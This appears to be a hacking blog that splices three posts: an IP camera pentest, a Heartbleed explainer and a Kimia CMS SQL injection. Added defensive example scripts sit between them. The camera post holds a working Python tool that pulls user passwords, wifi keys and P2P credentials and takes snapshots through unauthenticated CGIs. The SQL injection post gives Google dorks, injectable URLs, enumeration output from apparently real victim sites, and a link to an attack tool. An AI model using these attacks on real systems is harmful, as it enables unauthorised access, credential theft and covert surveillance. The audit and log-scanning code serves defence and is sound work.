Exploiting HDIPCamera MT9P006

I pentested a camera, finding numerous vulnerabilities.
Product info:
HDIPCamera MT9P006
Version 1.0.1.2 (Dec 4 2015)
1/2.5-Inch 5 Mp CMOS Digital Image Sensor
Boardtype: 5300
sensortype: mt9p006
The sensor is found in applications like:
• Digital still cameras
• Digital video cameras
• PC cameras
• Converged DSCs/camcorders
• Cellular phones
• PDAs
Let’s have a look. 😉
By just examining the source I found a few unprotected CGI requests.
A few important CGI requests can be used without any authorisation.

First, some basic info:

var serialNum="VVVIPCxxxxxxxxxxxx-xxxxxxxxxxxxx";
var model="RT_IPC"; var hardVersion="5300-mt9p006";
var softVersion="V2.3.5.2505-S50-SMA-B20151204B";
var ipcname="IPCAM";
var startdate="2016-8-30 21:56:44";
var runtimes="0 day, 1:58";
var sdstatus="out";
var sdfreespace="0 ";
var sdtotalspace="0 ";
var builddate="Dec 4 2015 ";
var productmodel="null";
var vendor="RTJ";
var swver="";
var hwver="";
var mppver="mpp";

P2P info

var p2p_enable = "1";
var p2p_id = "PPIV-xxxxx-WZDZZ";
var p2p_pwd = "xxx";

Wifi info

var wifissid = "xxx";
var wifikeytype = "3";
var wifiwhichkey = "0";
var wifikey="xxxxxxxxxxxxxxxx";
var wifienable="0";
var wifimac="xx:xx:xx:xx:xx:xx";
var wifienable="0";
var linkstatus="0";
var linkssid="";
var wifimode="";

rtsp info

var rtsplisnport="554";
var onvif_http_port="1018";
var rtsp_user_verify="0";

User info (Including passwords)

var name0="admin";
var password0="admin";
var authLevel0="255";
var name1="guest";
var password1="guest";
var authLevel1="3";
var name2="xxx";
var password2="xxx";
var authLevel2="3";
var name3="xxx";
var password3="xxx";
var authLevel3="3";
var name4="";
var password4="";
var authLevel4="3";
var name5="";
var password5="";
var authLevel5="3";
var name6="";
var password6="";
var authLevel6="3";
var name7="";
var password7="";
var authLevel7="3";
var name8="";
var password8="";
var authLevel8="0";
var name9="";
var password9="";
var authLevel9="0";
It's getting even better.
A world-readable URL with all the snapshots taken.
Oh wait.. let's make some snapshots..
Output:
var path="/tmpfs/snap_tmpfs/20160831/IMG001/IMG_chn0_TIMER_MNG_20160831230808_001.jpg"
.. a freshly made snapshot.
I wrote a Python script that uses these CGIs and prints all the info,
and that makes a snapshot and saves it locally.
#!/usr/bin/env python3

# Quick & Dirty tool
# Get all the info from the IPcam 5300 MT9P006
#
# Use commandline parameters to retrieve all kinds of info
#
# usage for all the info
# python IPcam_5300-mt9p006.py --ip <ip> --snapshot --getp2p --getwifi --getrtsp --getusers

import re
import argparse
from urllib.request import Request, urlopen

# CGI endpoints that answer without any authentication
p2p = "/cgi-bin/p2p.cgi?cmd=p2p.cgi&-action=get"
wifi = "/cgi-bin/getwifiattr.cgi"
rtsp = "/cgi-bin/hi3510/getrtsplisnport.cgi"
snap = "/web/cgi-bin/hi3510/param.cgi?cmd=snap"
snap_dir = "/tmpfs/snap_tmpfs/"
users = "/web/cgi-bin/hi3510/param.cgi?cmd=getuser"


def get(ip, path):
    # plain HTTP GET against the camera, response decoded as text
    return urlopen(Request("http://" + ip + path)).read().decode("utf-8", "replace")


def get_param():
    print("./IPcam_5300-mt9p006.py -h for cmd options")
    parser = argparse.ArgumentParser()
    parser.add_argument("--ip", dest="ip", default="", help="ip address", required=True)
    parser.add_argument("--snapshot", dest="snapshot", action="store_true", help="make and download snapshot")
    parser.add_argument("--getp2p", dest="getp2p", action="store_true", help="get p2p info (incl. password)")
    parser.add_argument("--getwifi", dest="getwifi", action="store_true", help="get wifi info (incl. password)")
    parser.add_argument("--getrtsp", dest="getrtsp", action="store_true", help="get rtsp info")
    parser.add_argument("--getusers", dest="getusers", action="store_true", help="get user info (incl. passwords)")
    return parser.parse_args()


def main():
    params = get_param()
    if params.snapshot:
        # call cgi to make snapshot and save to local drive
        print("make and download snapshot\n")
        url_data = get(params.ip, snap)
        # the cgi answers with: var path="/tmpfs/snap_tmpfs/<date>/IMGnnn/IMG_chn0_..._001.jpg"
        match = re.search(r'"(/[^"]*\.jpg)"', url_data)
        if match is None:
            print("unexpected snapshot response:\n" + url_data)
            return
        snapfile_path = match.group(1)
        snap_filename = re.search(r"IMG_.*\.jpg", snapfile_path).group(0)
        print("Snap file url: %s" % snapfile_path)
        print("Save output to: %s " % snap_filename)
        with open(snap_filename, "wb") as f:
            f.write(urlopen(Request("http://" + params.ip + snapfile_path)).read())

    if params.getp2p:
        print("Get p2p info")
        print(get(params.ip, p2p))
    if params.getwifi:
        print("Get wifi info")
        print(get(params.ip, wifi))
    if params.getrtsp:
        print("Get rtsp info")
        print(get(params.ip, rtsp))
    if params.getusers:
        print("Get users info")
        print(get(params.ip, users))


if __name__ == "__main__":
    main()
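
The getuser output shown above is worth auditing rather than just reading. The following script is an added example (not the post's tool) that parses the camera's "var nameN / passwordN / authLevelN" format and flags factory-default credentials, empty passwords on named accounts, and accounts at the full 255 privilege level. The sample dump is constructed after the one shown above, not captured from a device.

```python
import re

# Constructed sample in the camera's getuser format (modelled on the dump above)
SAMPLE_GETUSER = """var name0="admin";
var password0="admin";
var authLevel0="255";
var name1="guest";
var password1="guest";
var authLevel1="3";
var name2="operator";
var password2="";
var authLevel2="3";
var name3="";
var password3="";
var authLevel3="3";
"""

# Factory defaults visible in the dump above; any account still using them should be rotated
DEFAULT_CREDS = {("admin", "admin"), ("guest", "guest")}

# one 'var <key><slot>="<value>";' statement per line
VAR_RE = re.compile(r'var\s+([A-Za-z]+)(\d+)\s*=\s*"([^"]*)"\s*;')


def parse_users(text):
    """Group the flat var list into one dict per account slot, keyed by slot number."""
    slots = {}
    for key, idx, value in VAR_RE.findall(text):
        slots.setdefault(int(idx), {})[key] = value
    return slots


def audit_users(text):
    """Return (slot, name, finding) tuples for accounts that need attention."""
    findings = []
    for idx, slot in sorted(parse_users(text).items()):
        name = slot.get("name", "")
        pw = slot.get("password", "")
        level = int(slot.get("authLevel") or 0)
        if not name:
            continue  # unused slot
        if (name, pw) in DEFAULT_CREDS:
            findings.append((idx, name, "factory default credentials"))
        elif pw == "":
            findings.append((idx, name, "empty password"))
        if level >= 255:
            findings.append((idx, name, "full (255) privilege level"))
    return findings


if __name__ == "__main__":
    for slot, name, finding in audit_users(SAMPLE_GETUSER):
        print("slot %d (%s): %s" % (slot, name, finding))
```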


Heartbleed

Hacking in a heartbeat...
What is going on?

CVE-2014-0160

Heartbeat is an OpenSSL extension for keeping connections alive.
It now turns out there is a bug in it that returns too much information during the handshake,
including certificates, a memory dump of the site, cookies, sessions, etc. etc. (up to 64 KB).
It asks for confirmation of the connection, but gets a handful of random information from the server's memory instead.

It turns out to be so simple that any script kiddie can exploit this bug.

There are several scripts to be found on the net, as well as test sites to
check whether a website is vulnerable.
Among others Dropbox, Yahoo and the OpenSSL site itself are vulnerable.
One of the test sites: https://heartbleed.hostgator.com

Figures of 500,000 vulnerable websites are being mentioned;
unpatched websites are vulnerable, and blocking it is not really an option (at most with SNORT; I had already seen that they have made additions for it).

NMAP, Metasploit and Nessus have all three already added a plugin to their environment to test for this.

Solutions are also offered: the newest OpenSSL update provides the fix, and if that is not possible, all running software must be recompiled without this extension.

It now turns out this bug has existed for more than 2 years, and it is unclear whether it was already being abused before (NSA?), but now in any case on a large scale.

— to be continued!
I will expand this blog post in due course with examples, PoCs, and advice on how to prevent this.

You have been warned!
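
The bug behind CVE-2014-0160 is a missing length check. As an added example (not from this post and not OpenSSL's code) the following Python model shows the heartbeat record layout from RFC 6520, the pre-patch logic that trusts the 16-bit payload_length field (its 65535 maximum is where the "up to 64 KB" figure comes from), and the bounds check the fix adds. The bytes placed after the record are a constructed stand-in for adjacent server memory.

```python
import struct

HB_REQUEST = 1       # heartbeat_request message type
PADDING_MIN = 16     # RFC 6520: at least 16 bytes of random padding


def build_heartbeat(payload, claimed_length=None, padding=b"\x00" * PADDING_MIN):
    """Heartbeat body: type(1) | payload_length(2) | payload | padding.
    A claimed_length larger than len(payload) builds a record whose length field lies."""
    if claimed_length is None:
        claimed_length = len(payload)
    return struct.pack("!BH", HB_REQUEST, claimed_length) + payload + padding


def vulnerable_process(record, memory_after_record):
    """Pre-patch behaviour: echo payload_length bytes counted from the payload start,
    regardless of how long the record really is. memory_after_record is the constructed
    stand-in for whatever sits next to the record in the server's buffer."""
    _hbtype, payload_length = struct.unpack("!BH", record[:3])
    buf = record + memory_after_record
    return buf[3:3 + payload_length]


def patched_process(record):
    """Post-patch behaviour: silently discard the record unless type, length field,
    claimed payload and minimum padding all fit inside the bytes actually received."""
    if len(record) < 1 + 2 + PADDING_MIN:
        return None
    _hbtype, payload_length = struct.unpack("!BH", record[:3])
    if 1 + 2 + payload_length + PADDING_MIN > len(record):
        return None
    return record[3:3 + payload_length]


# Constructed stand-in for adjacent heap contents (not real data)
HEAP = b"Cookie: session=deadbeef; user=alice\r\n"

if __name__ == "__main__":
    honest = build_heartbeat(b"ping")
    lying = build_heartbeat(b"ping", claimed_length=60)
    print("honest record, patched    :", patched_process(honest))
    print("lying record, patched     :", patched_process(lying))
    print("lying record, vulnerable  :", vulnerable_process(lying, HEAP))
```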

[sqli] Kimia

An old one, but still works fine!

http://packetstormsecurity.org/files/view/101202/kimia-sql.txt
http://www.securityhome.eu/exploits/exploit_pdf.php?eid=11754170304e409574e5f234.09320930

http://www.victim.com/image-details.php?id=[SQL]
http://www.victim.com/alert_article.php?id=[SQL]
http://www.victim.com/news-article.php?id=[SQL]
http://www.victim.com/gallery-list.php?id=[SQL]
http://www.victim.com/newsitem.php?id=[SQL]

First, some Googling..

Google dorks:
inurl:"image-details.php?id="
inurl:"alert_article.php?id="
inurl:"news-article.php?id="
inurl:"gallery-list.php?id="
inurl:"newsitem.php?id="

http://<removed for privacy>/gallery-list.php?id=18
http://<removed for privacy>/producer/newsitem.php?id=6
http://<removed for privacy>/article.php?id=159
http://<removed for privacy>/products.php?id=41

Of course, the makers themselves:
http://www.kimia.co.za/newslist.php?interval=10&min=30&newsID=72
This one I won't remove 😉 they are vulnerable themselves 😛
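
The five scripts listed above take a numeric id, so any request where that parameter is not a plain integer is worth a look in the web server log. The following is an added example (not part of the original post) that scans Apache-style access log lines for the Kimia endpoints named above and reports ids that are not purely numeric; the log lines are constructed, and the client addresses are documentation ranges.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The Kimia CMS scripts whose id parameter the post above lists as injectable
KIMIA_ENDPOINTS = {
    "image-details.php", "alert_article.php", "news-article.php",
    "gallery-list.php", "newsitem.php",
}

# Apache combined-log prefix: client, identd, user, [timestamp], "METHOD target HTTP/x", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (not from a real server); lines 3 and 4 carry injection probes
SAMPLE_LOG = """\
203.0.113.5 - - [31/Aug/2016:23:08:08 +0200] "GET /gallery-list.php?id=18 HTTP/1.1" 200 5120
203.0.113.5 - - [31/Aug/2016:23:08:09 +0200] "GET /index.php?id=abc HTTP/1.1" 200 812
198.51.100.7 - - [31/Aug/2016:23:09:10 +0200] "GET /gallery-list.php?id=18%27 HTTP/1.1" 500 211
198.51.100.7 - - [31/Aug/2016:23:09:12 +0200] "GET /producer/newsitem.php?id=6%20and%201=1 HTTP/1.1" 200 4400
198.51.100.7 - - [31/Aug/2016:23:09:14 +0200] "GET /newsitem.php?id= HTTP/1.1" 200 4400
"""


def suspicious_requests(log_text):
    """Return (client, script, decoded id) for requests to a Kimia endpoint
    whose id parameter is anything other than a plain unsigned integer."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a request line we understand
        client, _ts, target, _status = m.groups()
        parts = urlsplit(target)
        script = parts.path.rsplit("/", 1)[-1]
        if script not in KIMIA_ENDPOINTS:
            continue
        # parse_qs percent-decodes, so the value is judged as the application would see it
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            if not value.isdigit():
                hits.append((client, script, value))
    return hits


if __name__ == "__main__":
    for client, script, value in suspicious_requests(SAMPLE_LOG):
        print("%s -> %s id=%r" % (client, script, value))
```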

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.2.6-1+lenny13
DB Server: MySQL >=5
Resp. Time(avg): 1678 ms
Current User: <removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:

System User: <removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
propeo_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL error based
Resp. Time(avg): 542 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:
System User: foxanr_1@<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
foxanr_db1


Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 1439 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB:

System User: @<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: @’%’
Data Bases: information_schema
joymag_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 3148 ms
Current User: kimiaa_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: kimiaa_db1
System User: kimiaa_1?dedi110


Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 2508 ms
Current User: @<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: robassu_db1
System User: @<removed for privacy>
Host Name:

table structure:  http://dl.dropbox.com/u/4378489/Forums/evilzone/Kimia_tables.html

Use with Havij Pro 1.15
http://www.ziddu.com/download/17108226/Havij_1.15_Pro.rar.html